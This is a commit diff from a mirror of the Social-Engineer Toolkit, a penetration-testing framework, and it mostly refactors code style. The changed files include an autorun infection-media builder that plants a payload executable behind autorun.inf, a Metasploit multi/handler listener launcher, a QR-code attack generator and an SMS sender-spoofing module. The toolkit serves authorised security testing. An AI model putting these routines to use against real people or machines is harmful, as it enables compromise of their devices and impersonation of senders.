Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-04-04 14:56:08 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #255 from Cabalist/master

Browse source 
More Code Review
This commit is contained in:
trustedsec 2016-07-28 22:28:05 -04:00 committed by GitHub
commit b0541ca7bf
16 changed files with 819 additions and 1663 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
requirements.txt
View file

@ -3,3 +3,7 @@ pycrypto
requests
pyopenssl
pefile
# Generate QR Codes
qrcode
pillow

85
seautomate
View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
import sys
import os
@ -71,50 +72,54 @@ if os.path.isfile(filename):
try:
print("[*] Spawning SET in a threaded process...")
child = pexpect.spawn("python setoolkit")
fileopen = open(filename, "r")
for line in fileopen:
line = line.rstrip()
# if we just use enter send default
if line == "":
line = "default"
with open(filename) as fileopen:
for line in fileopen:
line = line.rstrip()
# if we just use enter send default
if line == "":
line = "default"
match1 = re.search("OMGPASSWORDHERE", line)
if match1:
line = line.replace("OMGPASSWORDHERE", "")
password = True
match1 = re.search("OMGPASSWORDHERE", line)
if match1:
line = line.replace("OMGPASSWORDHERE", "")
password = True
if password is False:
print("[*] Sending command {0} to the interface...".format(line))
if password is True:
print("[*] Sending command [**********] (password masked) to the interface...")
password = False
if password is False:
print("[*] Sending command {0} to the interface...".format(line))
if password is True:
print("[*] Sending command [**********] (password masked) to the interface...")
password = False
if line == "default":
line = ""
if line == "default":
line = ""
if line == "CONTROL-C-HERE":
try:
print("[*] This may take a few seconds while SET catches up...")
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
if line == "CONTROL-C-HERE":
try:
print("[*] This may take a few seconds while SET catches up...")
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
# if the user is using pexpect < 2.3
except AttributeError:
print("[-] Error: You are running pexpect < 2.3 which is needed for this function")
choice = input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen(
"wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;tar -zxvf pexpect-2.3.tar.gz;cd pexpect-2.3;python setup.py install;cd ..;rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print("[*] Relaunch the Social-Engineer Toolkit for changes to apply.")
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
# if the user is using pexpect < 2.3
except AttributeError:
print("[-] Error: You are running pexpect < 2.3 which is needed for this function")
choice = input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen("wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;"
"tar -zxvf pexpect-2.3.tar.gz;"
"cd pexpect-2.3;"
"python setup.py install;"
"cd ..;"
"rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print("[*] Relaunch the Social-Engineer Toolkit for changes to apply.")
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
print("[*] Finished sending commands, interacting with the interface..")
child.interact()
@ -130,4 +135,4 @@ if os.path.isfile(filename):
# handle everything else
except Exception as e:
print("[*] Something went wrong, printing error: ", e)
print("[*] Something went wrong, printing error: {0}".format(e))

36
seproxy
View file

@ -7,6 +7,8 @@
import sys
import getpass
import os
import subprocess
import re
import src.core.setcore as core
@ -26,42 +28,34 @@ if operating_system == "posix":
definepath = os.getcwd()
print("\n[*] Welcome to the SET-Proxy Configuration Utility")
print("\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n")
print("\nEnter the proxy setting information below.\n\nExample: http://10.3.1.1:8080\n")
try:
proxy = input("Enter the proxy server: ")
username = input(
"Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass(
"Enter the password for the proxy (hit enter for none): ")
username = input("Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass("Enter the password for the proxy (hit enter for none): ")
except KeyboardInterrupt:
print("\n[!] Exiting the Social-Engineer Toolkit.")
sys.exit()
if username != "":
proxy_string = "export http_proxy='http://%s:%s@%s'" % (
username, password, proxy)
proxy_string = "export http_proxy='http://{0}:{1}@{2}'".format(username, password, proxy)
else:
proxy_string = "export http_proxy='http://{0}'".format(proxy)
if username == "":
proxy_string = "export http_proxy='http://%s'" % (proxy)
filewrite = open(core.setdir + "/proxy.config", "w")
filewrite.write(proxy_string)
filewrite.close()
from src.core.set import *
with open(os.path.join(core.setdir, "/proxy.config"), "w") as filewrite:
filewrite.write(proxy_string)
def kill_proc(port, flag):
proc = subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE)
proc = subprocess.Popen("netstat -antp | grep '{0}'".format(port), shell=True, stdout=subprocess.PIPE)
stdout_value = proc.communicate()[0]
a = re.search("\d+/%s" % (flag), stdout_value)
a = re.search("\d+/{0}".format(flag), stdout_value)
if a:
b = a.group()
b = b.replace("/%s" % (flag), "")
subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" %
(b), shell=True).wait()
b = b.replace("/{0}".format(flag), "")
subprocess.Popen("kill -9 {0} 1> /dev/null 2> /dev/null".format(b), shell=True).wait()
# cleans up stale processes from SET
try:
@ -72,7 +66,7 @@ if operating_system == "posix":
# handle errors
except Exception as error:
log(error)
core.log(error)
else:
print("[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system.")

102
setoolkit
View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
import os
import re
import shutil
@ -37,7 +38,8 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
# here we check to ensure we have the latest version
data = open("/etc/setoolkit/set.config", "r").read()
with open("/etc/setoolkit/set.config") as fileopen:
data = fileopen.read()
if "CONFIG_VERSION=7.2" not in data:
print("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
@ -48,7 +50,8 @@ import src.core.setcore as core
from src.core.menu import text
from src.core.update_config import update_config
if os.path.isfile(core.setdir + "/version.lock"): os.remove(core.setdir + "/version.lock")
if os.path.isfile(os.path.join(core.setdir, "version.lock")):
os.remove(os.path.join(core.setdir, "version.lock"))
# check directory and make it
if not os.path.isdir("src/logs/"):
@ -57,9 +60,8 @@ if not os.path.isdir("src/logs/"):
# check set logfile
if not os.path.isfile("src/logs/set_logfile.log"):
# create new log
filewrite = open("src/logs/set_logfile.log", "w")
filewrite.write("")
filewrite.close()
with open("src/logs/set_logfile.log", "w") as filewrite:
filewrite.write("")
# check which operating system
operating_system = core.check_os()
@ -74,15 +76,12 @@ if operating_system == "posix":
if not os.path.isdir(userdir):
os.makedirs(userdir)
if not os.path.isdir(core.setdir + "/reports/"):
os.makedirs(core.setdir + "/reports")
if not os.path.isdir(os.path.join(core.setdir, "reports")):
os.makedirs(os.path.join(core.setdir, "reports"))
# check to see if we have python-pycrypto
try:
from Crypto.Cipher import AES
except ImportError:
print("[!] The python-pycrypto python module not installed. You will lose the ability to use multi-pyinjector.")
pass
@ -102,9 +101,13 @@ update_config()
# chmod routine
if operating_system == "posix":
# change permissions if nix
subprocess.Popen(
"chmod +x seautomate;chmod +x set-update;chmod +x setup.py;chmod +x set-proxy;chmod +x src/payloads/ratte/ratteserver;chmod +x src/payloads/set_payloads/listener.py",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
subprocess.Popen("chmod +x seautomate;"
"chmod +x set-update;"
"chmod +x setup.py;"
"chmod +x set-proxy;"
"chmod +x src/payloads/ratte/ratteserver;"
"chmod +x src/payloads/set_payloads/listener.py",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
dns = core.check_config("DNS_SERVER=")
if dns.lower() == "on":
@ -114,8 +117,7 @@ if dns.lower() == "on":
for root, dirs, files in os.walk(core.setdir):
for f in files:
try:
match = re.search(
".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
if not match:
os.unlink(os.path.join(root, f))
@ -125,8 +127,7 @@ for root, dirs, files in os.walk(core.setdir):
# loop through all the directories
for d in dirs:
try:
match = re.search(
".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", d)
if not match:
shutil.rmtree(os.path.join(root, d))
except:
@ -135,9 +136,9 @@ for root, dirs, files in os.walk(core.setdir):
# if windows then do some stuff
if operating_system == "posix":
#
# ROOT CHECK
#
#
# ROOT CHECK
#
if os.geteuid() != 0:
print("\n The Social-Engineer Toolkit (SET) - by David Kennedy (ReL1K)")
@ -152,32 +153,38 @@ define_version = core.get_version()
core.cleanup_routine()
# create the set.options routine
filewrite = open(core.setdir + "/set.options", "w")
filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
filewrite.close()
with open(os.path.join(core.setdir, "/set.options"), "w") as filewrite:
filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
try:
# Remove old Signed_Updates
if os.path.isfile(core.setdir + "/Signed_Update.jar"):
os.remove(core.setdir + "/Signed_Update.jar")
if os.path.isfile(os.path.join(core.setdir, "/Signed_Update.jar")):
os.remove(os.path.join(core.setdir, "/Signed_Update.jar"))
# initial user menu
if not os.path.isfile("src/agreement4"):
fileopen = open("readme/LICENSE", "r")
for line in fileopen:
print((line.rstrip()))
with open("readme/LICENSE") as fileopen:
for line in fileopen:
print((line.rstrip()))
print((core.bcolors.RED + """
The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.""" + core.bcolors.GREEN))
print("{0}The Social-Engineer Toolkit is designed purely"
" for good and not evil. If you are planning on "
"using this tool for malicious purposes that are "
"not authorized by the company you are performing "
"assessments for, you are violating the terms of "
"service and license of this toolset. By hitting "
"yes (only one time), you agree to the terms of "
"service and that you will only use this tool for "
"lawful purposes only.{1}".format(core.bcolors.RED, core.bcolors.ENDC))
print(core.bcolors.GREEN)
choice = input("\nDo you agree to the terms of service [y/n]: ")
choice += " " # b/c method below
if choice[0].lower() == "y":
filewrite = open("src/agreement4", "w")
filewrite.write("user accepted")
filewrite.close()
with open("src/agreement4", "w") as filewrite:
filewrite.write("user accepted")
print(core.bcolors.ENDC)
else:
print((core.bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + core.bcolors.ENDC))
print(core.bcolors.ENDC + "[!] Exiting the Social-Engineer Toolkit, have a nice day." + core.bcolors.ENDC)
sys.exit()
while True:
@ -192,10 +199,8 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# funny
if main_menu_choice == "hugs":
core.print_warning(
"Have you given someone a hug today? Remember a hug can change the world.")
pause = input(
"\nPlease give someone a hug then press {return} to continue.")
core.print_warning("Have you given someone a hug today? Remember a hug can change the world.")
pause = input("\nPlease give someone a hug then press {return} to continue.")
# funny2
if main_menu_choice == "freehugs":
@ -204,21 +209,17 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# funny3
if main_menu_choice == "derbycon":
core.print_warning(
core.bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 6.0 'Recharge' -- September 23th - 25th 2016" + core.bcolors.ENDC)
pause = input(
core.bcolors.BOLD + "\nDon't miss it! Sep 23 - Sep 25th! Press {return} to continue." + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 6.0 'Recharge' -- September 23th - 25th 2016" + core.bcolors.ENDC)
pause = input(core.bcolors.BOLD + "\nDon't miss it! Sep 23 - Sep 25th! Press {return} to continue." + core.bcolors.ENDC)
# rance
if main_menu_choice == "rance":
core.print_warning(
core.bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "We miss you buddy. David Jones (Rance) changed a lot of us and you'll always be apart of our lives (and SET). Fuck Cancer." + core.bcolors.ENDC)
pause = input("Press {return} to continue.")
# cavs
if main_menu_choice == "cavs":
core.print_warning(
core.bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + core.bcolors.ENDC)
core.print_warning(core.bcolors.BOLD + "2015-2016 CHAMPS BABY!!! C l e e e e e e v eeee l a a n n d d d d d d d d d d d " + core.bcolors.ENDC)
pause = input("Press {return} to continue.")
# quit out
@ -268,13 +269,14 @@ The Social-Engineer Toolkit is designed purely for good and not evil. If you are
# handle keyboard interrupts
except KeyboardInterrupt:
print(("\n\nThank you for " + core.bcolors.RED + "shopping" + core.bcolors.ENDC +
" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"))
print(("\n\nThank you for {0}shopping{1} with the Social-Engineer Toolkit."
"\n\nHack the Gibson...and remember...hugs are worth more "
"than handshakes.\n".format(core.bcolors.RED, core.bcolors.ENDC)))
# handle exceptions
except Exception as error:
log(error)
print ("\n\n[!] Something went wrong, printing the error: "+ str(error))
core.log(error)
print("\n\n[!] Something went wrong, printing the error: " + str(error))
# cleanup routine
core.cleanup_routine()

48
setup.py
View file

@ -1,4 +1,5 @@
#!/usr/bin/env python
# coding=utf-8
#
# Python installer
#
@ -36,19 +37,19 @@ if platform.system() == "Linux":
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
subprocess.Popen(
"apt-get --force-yes -y install git apache2 python-requests libapache2-mod-php python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl", shell=True).wait()
subprocess.Popen("apt-get --force-yes -y install "
"git apache2 python-requests libapache2-mod-php "
"python-pymssql build-essential python-pexpect "
"python-pefile python-crypto python-openssl", shell=True).wait()
# If pacman.conf exists, we have a Arch based system
elif os.path.isfile("/etc/pacman.conf"):
subprocess.Popen(
"pacman -S --noconfirm --needed git python2 python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen(
"wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen(
"tar xvfz pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen(
"chmod a+x pefile-1.2.10-139/setup.py", shell=True).wait()
subprocess.Popen("pacman -S --noconfirm --needed git python2 "
"python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen("wget https://pefile.googlecode.com/files/pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen("tar xvfz pefile-1.2.10-139.tar.gz", shell=True).wait()
subprocess.Popen("chmod a+x pefile-1.2.10-139/setup.py", shell=True).wait()
subprocess.Popen("rm -rf pefile-1.2.10-139*", shell=True).wait()
# if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
@ -58,14 +59,12 @@ if platform.system() == "Linux":
# if sources.list or pacman.conf is not available then we're running
# something offset
else:
print(
"[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
sys.exit()
if os.path.isdir("/usr/share/setoolkit"):
print(
"[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
sys.exit()
if not os.path.isfile("/usr/bin/git"):
@ -77,14 +76,10 @@ if platform.system() == "Linux":
cwdpath = os.getcwd()
subprocess.Popen("cd ..;cp -rf %s /usr/share/setoolkit" % cwdpath, shell=True).wait()
print("[*] Installing setoolkit installer to /usr/bin/setoolkit...")
subprocess.Popen(
"echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen(
"cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
subprocess.Popen("echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
subprocess.Popen("chmod +x /usr/bin/setoolkit", shell=True).wait()
#print("[*] Note you will manually need to install Core Security 'Impacket'")
#print("[*] Download link: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket")
@ -93,9 +88,8 @@ if platform.system() == "Linux":
print("[*] We are now finished! To run SET, type setoolkit...")
if platform.system() == 'Darwin':
subprocess.Popen(
"easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
if platform.system() != "Linux":
if platform.system() != "Darwin":
print("[!] Sorry this installer is not designed for any other system other than Linux and Mac. Please install the Python dependencies manually.")
if platform.system() not in ["Linux", "Darwin"]:
print("[!] Sorry this installer is not designed for any other system other "
"than Linux and Mac. Please install the Python dependencies manually.")

10
seupdate
View file

@ -1,11 +1,11 @@
#!/usr/bin/env python
# coding=utf-8
#
# simple git update for set pulling from core modules
#
import os
import sys
import src.core.setcore as core
# check where we are and load default directory
@ -14,17 +14,17 @@ if os.path.isdir("/usr/share/setoolkit"):
os.chdir("/usr/share/setoolkit")
sys.path.append("/usr/share/setoolkit")
import src.core.setcore as core
# if we can't see our config then something didn't go good..
if not os.path.isfile("/etc/setoolkit/set.config"):
core.print_error("Cannot locate SET executable. Try running from the local directory.")
core.print_error("If this does not work, please run the setup.py install file.")
sys.exit()
from src.core.setcore import *
try:
# pull update set from the core libraries
update_set()
core.update_set()
# except keyboard interrupts
except KeyboardInterrupt:
@ -32,4 +32,4 @@ except KeyboardInterrupt:
# handle all other errors
except Exception as e:
print("\n[!] Something went wrong.. Printing the error: {}".format(e))
print("\n[!] Something went wrong.. Printing the error: {0}".format(e))

118
src/autorun/autolaunch.py
View file

@ -1,83 +1,93 @@
#!/usr/bin/env python
# coding=utf-8
# simple autorun creation for set
import subprocess
import os
import re
import sys
from src.core.setcore import *
import subprocess
from time import sleep
import src.core.setcore as core
# define metasploit path
definepath = os.getcwd()
msf_path = meta_path()
me = mod_name()
msf_path = core.meta_path()
me = core.mod_name()
autorun_path = os.path.join(core.setdir, "autorun")
trigger = 0
if check_options("INFECTION_MEDIA=") == "ON":
if core.check_options("INFECTION_MEDIA=") == "ON":
trigger = 1
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir %s/autorun 1> /dev/null 2> /dev/null;cp %s/payload.exe %s/autorun/program.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir, setdir, setdir), shell=True).wait()
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "payload.exe"),
os.path.join(autorun_path, "program.exe")),
shell=True).wait()
if os.path.isfile(setdir + "/fileformat.file"):
if os.path.isfile(os.path.join(core.setdir, "fileformat.file")):
trigger = 2
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/template.pdf autorun/ 1> /dev/null 2>/dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path,
os.path.join(core.setdir, "template.pdf")),
shell=True).wait()
if os.path.isfile(setdir + "/dll/openthis.wab"):
subprocess.Popen("rm -rf %s/autorun/ 1> /dev/null 2> /dev/null;mkdir autorun 1> /dev/null 2> /dev/null;cp %s/dll/* autorun/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "/dll/openthis.wab")):
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "/dll/*")),
shell=True).wait()
trigger = 3
if not os.path.isdir(setdir + "/autorun"):
os.makedirs(setdir + "/autorun/")
filewrite = open(setdir + "/autorun/autorun.inf", "w")
if not os.path.isdir(autorun_path):
os.makedirs(autorun_path)
# if using standard payloads
if trigger == 1:
payload = "program.exe" # "" + alpha_data + "\""
with open(os.path.join(autorun_path, "autorun.inf"), 'w') as filewrite:
# if using standard payloads
if trigger == 1:
payload = "program.exe" # "" + alpha_data + "\""
# if using pdf payload
if trigger == 2:
payload = "template.pdf"
# if using pdf payload
elif trigger == 2:
payload = "template.pdf"
if trigger == 3:
payload = "openthis.wab"
elif trigger == 3:
payload = "openthis.wab"
filewrite.write("""[autorun]
open=%s
icon=autorun.ico""" % (payload))
filewrite.close()
print_status(
"Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
print_status(
"Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
else:
payload = ""
filewrite.write("""[autorun]\nopen={0}\nicon=autorun.ico""".format(payload))
core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger == 1 or trigger == 2 or trigger == 3:
choice1 = yesno_prompt("0", "Create a listener right now [yes|no]")
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(setdir + "/meta_config"):
filewrite = open(setdir + "/meta_config", "w")
fileopen = open(setdir + "/payload.options", "r")
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload " + line[0] + "\n")
filewrite.write("set lhost " + line[1] + "\n")
filewrite.write("set lport " + line[2] + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
filewrite.write("set lport {0}\n".format(line[2]))
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
# create the listener
print_status(
"Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("%smsfconsole -r %s/meta_config" %
(msf_path, setdir), shell=True).wait()
core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")),
shell=True).wait()
else:
print_warning("cancelling...")
core.print_warning("cancelling...")
sleep(2)

1048
src/qrcode/qrcode.py
View file

File diff suppressed because it is too large Load diff

25
src/qrcode/qrgenerator.py
View file

@ -1,21 +1,26 @@
from src.qrcode.qrcode import *
from src.core.setcore import *
# coding=utf-8
import os
import time
import src.core.setcore as core
import qrcode
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
qr.addData(url)
qr = qrcode.QRCode(5, error_correction=qrcode.constants.ERROR_CORRECT_L)
qr.add_data(url)
qr.make()
im = qr.makeImage()
im = qr.make_image()
time.sleep(1)
if os.path.isfile(setdir + "/reports/qrcode_attack.png"):
os.remove(setdir + "/reports/qrcode_attack.png")
qr_img_path = os.path.join(core.setdir, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path):
os.remove(qr_img_path)
# save the image out
im.save(setdir + "/reports/qrcode_attack.png", format='png')
im.save(qr_img_path, format='png')
# print that its been successful
print_status(
"QRCode has been generated under %s/reports/qrcode_attack.png!" % (setdir))
core.print_status("QRCode has been generated under {0}".format(qr_img_path))

102
src/sms/sms.py
View file

@ -1,35 +1,79 @@
#!/usr/bin/env python
# coding=utf-8
from src.sms.protectedapi import send_sms
import src.core.setcore as core
try:
from src.core.setcore import *
from src.sms.protectedapi import send_sms
import requests
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. This is a third party service outside of the control from the Social-Engineer Toolkit. The fine folks over at spoofmytextmessage.com have provided an undocumented API for us to use in order to allow SET to perform the SMS spoofing. You will need to visit https://www.spoofmytextmessage.com and sign up for an account. They example multiple payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your plan that you want, you will need to remember your email address and password used for the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding spoofmytextmessage.com\n")
print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and services from spoofmytextmessage.com and you are fully aware of your countries legal stance on SMS spoofing prior to performing any of these. By accepting yes you fully acknowledge these terms and will not use them for unlawful purposes.")
message = raw_input("\nDo you accept these terms (yes or no): ")
if message == "yes":
print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = raw_input(setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = raw_input(setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
print_status("The next section requires a country code, this is the code you would use to dial to the specific country, for example if I was sending a message to 555-555-5555 to the United States (or from) you would enter +1 below.")
tocountry = raw_input(setprompt(["7"], "Enter the country code for the number you are sending TO (for example U.S would be '+1')[+1]"))
if tocountry == "": tocountry = "+1"
fromcountry = raw_input(setprompt(["7"], "Enter the country code for the number you are sending FROM (for example U.S. would be '+1')[+1]"))
if fromcountry == "": fromcountry = "+1"
tonumber = raw_input(setprompt(["7"], "Enter the number to send the SMS TO - be sure to include country code (example: +15551234567)"))
fromnumber = raw_input(setprompt(["7"], "Enter the number you want to come FROM - be sure to include country code (example: +15551234567)"))
message = raw_input(setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source - this was done at the request of the third party we use since the API is not documented. I hand wrote the code and can validate its authenticity - it imports python requests and json and uses that to interact with the API. From a security standpoint if you are uncomfortable using this - feel free to ping me and I can walk you through what I do without giving away the API from the third party.
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
except ImportError:
print_error("Looks like you dont have python-requests installed. Please install (apt-get install python-requests) and try again.")
core.print_error("Looks like you dont have python-requests installed. "
"Please install (apt-get install python-requests) and try again.")
print("Press {return} to continue.")
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = input(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
# I hand wrote the code and can validate its authenticity - it imports python requests
